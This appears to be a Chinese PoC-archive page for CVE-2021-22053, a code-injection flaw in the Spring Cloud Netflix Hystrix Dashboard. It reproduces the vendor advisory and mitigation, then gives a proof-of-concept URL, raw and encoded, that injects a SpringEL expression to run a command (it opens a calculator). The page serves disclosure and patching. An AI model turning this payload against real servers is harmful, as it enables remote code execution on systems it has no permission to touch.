关联漏洞
标题:VMware Spring Cloud Netflix 代码注入漏洞 (CVE-2021-22053)Description:Vmware VMware Spring Cloud Netflix是美国威睿(Vmware)公司的一个服务。通过自动配置和绑定到 Spring Environment 和其他 Spring 编程模型习语,为 Spring Boot 应用程序提供 Netflix OSS 集成。 VMware Spring Cloud Netflix 存在安全漏洞,该漏洞源于使用spring cloud netflix hystrix dashboard和spring boot starter thymeleaf的应用程序
Description
Spring Cloud Netflix Hystrix Dashboard template resolution vulnerability CVE-2021-22053
介绍
## CVE-2021-22053: Spring Cloud Netflix Hystrix Dashboard template resolution vulnerability
### Severity
High
### Vendor
Spring by VMware
### Description
Applications using both `spring-cloud-netflix-hystrix-dashboard` and `spring-boot-starter-thymeleaf` expose a way to execute code submitted within the request URI path during the resolution of view templates. When a request is made at `/hystrix/monitor;[user-provided data]`, the path elements following `hystrix/monitor` are being evaluated as SpringEL expressions, which can lead to code execution.
### Affected VMware Products and Versions
Severity is high unless otherwise noted.
- Spring Cloud Netflix
- 2.2.0.RELEASE to 2.2.9.RELEASE
- Older, unsupported versions are also affected
### Mitigation
Users of affected versions should apply the following mitigation: Users should upgrade to 2.2.10.RELEASE+. No other steps are necessary. Releases that have fixed this issue include:
- Spring Cloud Netflix
- 2.2.10.RELEASE+
### Credit
This vulnerability was identified and responsibly reported by threedr3am of SecCoder Security Lab (threedr3am@foxmail.com).
### References
https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L
### History
2021-11-17: Initial vulnerability report published.
### POC
raw:
```
http://127.0.0.1:8080/hystrix/;a=a/__${T (java.lang.Runtime).getRuntime().exec("open -a calculator")}__::.x/
```
encode:
```
http://127.0.0.1:8080/hystrix/;a=a/__$%7BT%20(java.lang.Runtime).getRuntime().exec(%22open%20-a%20calculator%22)%7D__::.x/
```
PS. The diagonal bar'/' cannot be carried in the command
文件快照
[4.0K] /data/pocs/df039a3802e8ddc0ceb43a20c03f13f8a02a4603
├── [ 629] build.gradle
├── [4.0K] gradle
│ └── [4.0K] wrapper
│ ├── [ 58K] gradle-wrapper.jar
│ └── [ 200] gradle-wrapper.properties
├── [5.6K] gradlew
├── [2.6K] gradlew.bat
├── [ 11K] LICENSE
├── [1.6K] README.md
├── [ 75] settings.gradle
└── [4.0K] src
└── [4.0K] main
└── [4.0K] java
└── [4.0K] me
└── [4.0K] threedr3am
└── [4.0K] hystrix
└── [4.0K] rce
└── [ 467] Application.java
9 directories, 9 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。